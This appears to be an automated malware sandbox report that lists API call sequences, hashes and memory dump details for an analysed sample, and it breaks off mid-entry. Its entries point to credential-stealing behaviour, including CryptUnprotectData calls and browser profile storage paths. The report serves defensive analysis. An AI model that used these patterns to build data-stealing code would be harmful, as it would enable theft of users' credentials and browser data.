                                • API String ID: 4291131564-0
                                • Opcode ID: 90e35085d09e86929496687214824d8b390631e76b8ad93aa6dcb5c47c74c453
                                • Instruction ID: c2592d02799a4c05126011294909bed4ba482435ab91368e2b1d2e543d6133d2
                                • Opcode Fuzzy Hash: 90e35085d09e86929496687214824d8b390631e76b8ad93aa6dcb5c47c74c453
                                • Instruction Fuzzy Hash: 4FF01D707443227BEB301F65BC49F667BA8EF44B60F200114FB45EA2D4D7B49880CBA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #w$WOg$xAX1
                                • API String ID: 0-2226314661
                                • Opcode ID: ceccf9539d3ce6bba646fd5476392a651041eadf61dbefddd9b3f08ddb7cf37f
                                • Instruction ID: 196f0a801965873d54243557ff79ca2b7095405927f8f3af2f61b906576647fa
                                • Opcode Fuzzy Hash: ceccf9539d3ce6bba646fd5476392a651041eadf61dbefddd9b3f08ddb7cf37f
                                • Instruction Fuzzy Hash: 0372F5F360C204AFE304AF2DEC8566ABBE9EF94720F16492DE6C4C3744EA3558458797
                                APIs
                                • CoCreateInstance.COMBASE(0101B110,00000000,00000001,0101B100,?), ref: 0100CB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0100CB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 0100CBC9
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                • Opcode ID: b518738b238493f3f2da6afcb42f7155546cf338e1c862ab2180e7da62af223c
                                • Instruction ID: 253767941181a33a8c897e7e6133e34dcb04cd56e674ab88700734b465ada863
                                • Opcode Fuzzy Hash: b518738b238493f3f2da6afcb42f7155546cf338e1c862ab2180e7da62af223c
                                • Instruction Fuzzy Hash: 3E315471A40614BFE710DB98CC85FA977B99B88B10F1042C4FB54EB2D0D7B1AE44CB90
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FF9B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00FF9BB3
                                • LocalFree.KERNEL32(?), ref: 00FF9BD7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 8dac509ea924746f8b15f4fe70dd5d3c0c5c545b0a74550e7e9de0398535607a
                                • Instruction ID: 4d91b538d3709c32258d97fa48e9c6f423ef18f118e72cd7c13b2bc0fd2ba5b6
                                • Opcode Fuzzy Hash: 8dac509ea924746f8b15f4fe70dd5d3c0c5c545b0a74550e7e9de0398535607a
                                • Instruction Fuzzy Hash: EA011275E413197BDB209FA4DC49FAEB778EB84700F104555EB04AB284D7B49E00C7D4
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: f`uw$FO:
                                • API String ID: 0-2050306468
                                • Opcode ID: 192c53e3c504d02f5629c17100383c8bf2dbb011fe7a816f7a24a646f50d0711
                                • Instruction ID: e6c6aed45a96efb6932cefc696839aedb06098e627fe540ee1bd287a1200a94d
                                • Opcode Fuzzy Hash: 192c53e3c504d02f5629c17100383c8bf2dbb011fe7a816f7a24a646f50d0711
                                • Instruction Fuzzy Hash: 375147F3B082145BF304592EEC4577BB7DADBD4320F2A863DEA84D7384E9399D024296
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: d3?2$1w
                                • API String ID: 0-3284953598
                                • Opcode ID: 60d6b62c284656c9d8c8ad52665b2079038d58b7142a66784c8f637ce9e81d90
                                • Instruction ID: f35eb0fadbd4f54d7eaafc1f0ef6b8c786914744ce26eb71fc937a74708ada5a
                                • Opcode Fuzzy Hash: 60d6b62c284656c9d8c8ad52665b2079038d58b7142a66784c8f637ce9e81d90
                                • Instruction Fuzzy Hash: BE5158F3E087285BE340AE2CDC8473AF7D9EB54610F1A463DDAC987344E9759A0587C2
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b7308a946c6ea18a26d4d8c7f373981001719572399e34b90b625a41b1b39659
                                • Instruction ID: d4c80c857e0c58402e9115cbd128c5d1838e0da919c2d4a662a5a8f31efe1923
                                • Opcode Fuzzy Hash: b7308a946c6ea18a26d4d8c7f373981001719572399e34b90b625a41b1b39659
                                • Instruction Fuzzy Hash: 9B5105F3A086049FF314AE1AEC4577AFBD6EFD0320F16853EDA8497744EE7948418692
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6668b47c29f06738a60799615f6ed0ec06c0972a2fcc2a9dffcf5b186fdef16
                                • Instruction ID: 517580e7dc96d3c8a5eb7f50a116d2eaa6c274f8b16bfd812b0ffde004183b4b
                                • Opcode Fuzzy Hash: d6668b47c29f06738a60799615f6ed0ec06c0972a2fcc2a9dffcf5b186fdef16
                                • Instruction Fuzzy Hash: B55114B39182249BD3102E2CED897AABFE8EF15720F060A3DEED4D7740E635590586D3
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                • Opcode ID: 05c089562f9f04b9ab97a84812e7d50b13fc70e67aa24b5f1a7920f12ec592a8
                                • Instruction ID: 7354b455a5f71d65d65f7b16531e4919f68625910e15c6fc19cb961cb779c3d8
                                • Opcode Fuzzy Hash: 05c089562f9f04b9ab97a84812e7d50b13fc70e67aa24b5f1a7920f12ec592a8
                                • Instruction Fuzzy Hash: 30512BF3F081145FF3146A29EC45B7ABBD9DB94320F1A463DEAC8D3380E93A5C148696
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                • Opcode ID: b4ab77d2240785f56439e117a8a7c617883fc674255d375267ba235ad1745843
                                • Instruction ID: 69bac34b871ebdb880e4864322bbd0024ea52f81edd399e9f3d246178c1b6591
                                • Opcode Fuzzy Hash: b4ab77d2240785f56439e117a8a7c617883fc674255d375267ba235ad1745843
                                • Instruction Fuzzy Hash: 744159F3D186149BF304AE19DC417BAF7D6DB94720F1A853DEB9893380E57D9C008696
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                • Opcode ID: f47fcc8edd19de74f0c3b5af00062d5703063ac1e6c964dbe36e122eb9e6fb44
                                • Instruction ID: d69d9671775e4cdcf0683ddc41504e49a32465f23b0d0b77ffc463e7d5da7b78
                                • Opcode Fuzzy Hash: f47fcc8edd19de74f0c3b5af00062d5703063ac1e6c964dbe36e122eb9e6fb44
                                • Instruction Fuzzy Hash: 8B214FB290C314AFE315BE59DC8676AF7E8FF58310F06092DEBD483710E63168008A87
                                Memory Dump Source
                                • Source File: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                • Opcode ID: 8258f7f8c350507ec60dcc7484d67634d141004a364b6fafcf58ee5baf6e0ecb
                                • Instruction ID: 056a53e596a06d371324fe73120a5846d77ff8f0000e073b51178db8c1f3b32b
                                • Opcode Fuzzy Hash: 8258f7f8c350507ec60dcc7484d67634d141004a364b6fafcf58ee5baf6e0ecb
                                • Instruction Fuzzy Hash: 4C113AB250C304AFE359BE69DC857AEB7E5FB58310F06092DD3D583610E735A4508A47
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 01008636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 010086AA
                                • StrStrA.SHLWAPI(?,00D6EA18), ref: 010086CF
                                • lstrcpyn.KERNEL32(012293D0,?,00000000), ref: 010086EE
                                • lstrlen.KERNEL32(?), ref: 01008701
                                • wsprintfA.USER32 ref: 01008711
                                • lstrcpy.KERNEL32(?,?), ref: 01008727
                                • StrStrA.SHLWAPI(?,00D6EB20), ref: 01008754
                                • lstrcpy.KERNEL32(?,012293D0), ref: 010087B4
                                • StrStrA.SHLWAPI(?,00D6ECE8), ref: 010087E1
                                • lstrcpyn.KERNEL32(012293D0,?,00000000), ref: 01008800
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
                                • API String ID: 2672039231-3252725368
                                • Opcode ID: 6fe0ada13ceac8f477553b9eef54c412ba3c27ce2ec68e16b8fb5b42689625fa
                                • Instruction ID: 3d5b9ca86b0fd8037e3e9274ffeb441abf81844da4bc15b8f9b88ed4d5488ce7
                                • Opcode Fuzzy Hash: 6fe0ada13ceac8f477553b9eef54c412ba3c27ce2ec68e16b8fb5b42689625fa
                                • Instruction Fuzzy Hash: 48F17071900128AFDB21DF68ED4CEAE77B9EF48304F145599FA49E7244DB74AE40CBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF1F9F
                                • lstrlen.KERNEL32(00D68980), ref: 00FF1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF1FE3
                                • lstrlen.KERNEL32(01021794), ref: 00FF1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF200E
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF204D
                                • lstrlen.KERNEL32(01021794), ref: 00FF2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF2075
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF2081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF20AC
                                • lstrlen.KERNEL32(?), ref: 00FF20E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF2104
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF2112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF2139
                                • lstrlen.KERNEL32(01021794), ref: 00FF214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF216B
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF2177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF21A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF21D4
                                • lstrlen.KERNEL32(?), ref: 00FF21EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF220A
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF2218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF2242
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF227F
                                • lstrlen.KERNEL32(00D6D398), ref: 00FF228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF22B1
                                • lstrcat.KERNEL32(00000000,00D6D398), ref: 00FF22B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF22F7
                                • lstrcat.KERNEL32(00000000), ref: 00FF2304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FF2356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF2382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF23BF
                                • DeleteFileA.KERNEL32(00000000), ref: 00FF23F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00FF2444
                                • FindClose.KERNEL32(00000000), ref: 00FF2453
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                • Opcode ID: 9452efb2708756a4c7bc3fe0bd0490c66574e71b134da6c6182aff5316396720
                                • Instruction ID: e4dfed190cff86889b7cd7f52bc6612d9394d83e6a94e9e9a2bdeca5b2c49e6c
                                • Opcode Fuzzy Hash: 9452efb2708756a4c7bc3fe0bd0490c66574e71b134da6c6182aff5316396720
                                • Instruction Fuzzy Hash: 6FE17E31A1021EABDB71EF64EC89ABE77B9AF04310F045024FA05E7265DB78DD41EB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006445
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01006480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 010064AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010064E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0100650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01006537
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                • Opcode ID: 02335284af1b35041601b9f1a7c1b8e969bb3177feff71aef330e80eb407244a
                                • Instruction ID: e7d9751a237bc29a9290d946b29a345fa426a56ca1c3613bf573490de595637a
                                • Opcode Fuzzy Hash: 02335284af1b35041601b9f1a7c1b8e969bb3177feff71aef330e80eb407244a
                                • Instruction Fuzzy Hash: D2F1C3709002199FFB72EF68DC49AAE7BFAAF04300F044168F985DB295DB39D951DB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010043A3
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010043D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 010043FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01004409
                                • lstrlen.KERNEL32(\storage\default\), ref: 01004414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0100443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01004471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004498
                                • lstrcpy.KERNEL32(00000000,?), ref: 010044D7
                                • lstrcat.KERNEL32(00000000,?), ref: 010044DF
                                • lstrlen.KERNEL32(01021794), ref: 010044EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01004507
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01004513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 0100451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 01004547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 010045A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 010045A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 01004601
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 01004653
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100467B
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010046AF
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                • Opcode ID: 30356d43868026e66cb99f5eccb4664cba0caef45406f6d4a0db6fffbf0f6a38
                                • Instruction ID: 27785f0740d9e5c6bed267959a214ff5e92e3bf2b7a866b7e281d4ab9238efab
